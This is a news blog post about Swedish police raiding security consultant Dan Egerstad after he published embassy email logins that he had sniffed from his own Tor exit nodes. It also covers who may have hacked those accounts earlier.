Dan Egerstad, the Swedish computer security consultant I interviewed in August who obtained log-in and password information for 1,000 e-mail accounts belonging to foreign embassies, corporations and human rights organizations, had his house raided on Monday by Swedish officials, who took him in for questioning.
Egerstad (at right) said that on Monday morning as he was leaving his apartment in Malmo to move his car, he opened his front door to find five plainclothes men standing at the entrance. Four of the agents showed him identification but one of them wouldn't show him identification or give his name. He says the four with IDs belonged to the Swedish National Police (the country's domestic agency), and the fifth one was an agent of the SAPO (Sweden's CIA). The agents had driven to Malmo from Stockholm to conduct the raid.
While three of them took him to the local police headquarters for questioning, the other two agents ransacked his house and hauled away three computers, external hard drives, CDs, notebooks and various papers.
"It was like out of a bad movie," Egerstad says.
Egerstad hasn't been charged with anything but is under suspicion for breaking into computers, which he says he never did. Egerstad said the agents told him they were investigating him because he had "pissed off some foreign countries."
"It seems like some foreign country has contacted Sweden and asked them to do this," Egerstad said. He asked the agents if the foreign entity that was angry with him was Hong Kong and the agents nodded and said another foreign entity was also upset with him. They didn't tell Egerstad which country that was.
Egerstad created a stir three months ago when he posted on his web site the log-in information and passwords for 100 of the 1,000 e-mail accounts for which he obtained log-ins and passwords. (His site is no longer online). He posted the information, he said, because he felt it would be the most effective way to make the account owners aware that their communication had been compromised.
Initially, Egerstad refused to disclose how he obtained the log-ins and passwords. But then in September he revealed that he'd intercepted the information through five exit nodes that he'd set up on the Tor network in Asia, the US and Europe.
Tor is used by people who want to maintain privacy and don't want anyone to know where they go on the web or with whom they communicate. Tor traffic is encrypted while it's enroute, but is decrypted as it leaves the exit node and goes to its final destination. Egerstad simply sniffed the plaintext traffic that passed through his five exit nodes to obtain the user names and passwords of e-mail accounts.
Egerstad didn't hack any systems to obtain the data and therefore says he didn't break any laws, but once he posted the log-in details for the accounts online he provided others with all the information they needed to breach the accounts and read sensitive correspondence stored in them. As I mentioned in August, a reporter for the Indian Express newspaper was able to access the e-mail account belonging to India's ambassador to China and obtained the transcript of a meeting between the embassador and the Chinese foreign minister.
As Egerstad and I discussed the problem in August, we both came to the conclusion that the embassy employees were likely not using Tor nor even knew what Tor was. Instead, we suspected that the traffic he sniffed belonged to someone who had hacked the accounts and was eavesdropping on them via the Tor network. As the hacked data passed through Egerstad's Tor exit nodes, he was able to read it as well.
So who was responsible for hacking the accounts? The likely suspect -- given that most of the accounts Egerstad uncovered belonged to embassies, foreign and defense ministry officials, legislators and human rights groups -- was a government or intelligence agency. I attempted to contact several of the account holders in August to ask them whether they used Tor or knew that their accounts had been compromised but never received a response from any of them.
Egerstad told me today that he has since received confirmation that two of the e-mail accounts he exposed in August were indeed hacked by unknown intruders before he exposed them. He wouldn't say which accounts those were or in what country the accounts resided.
Photo: Dan Egerstad
See Also:
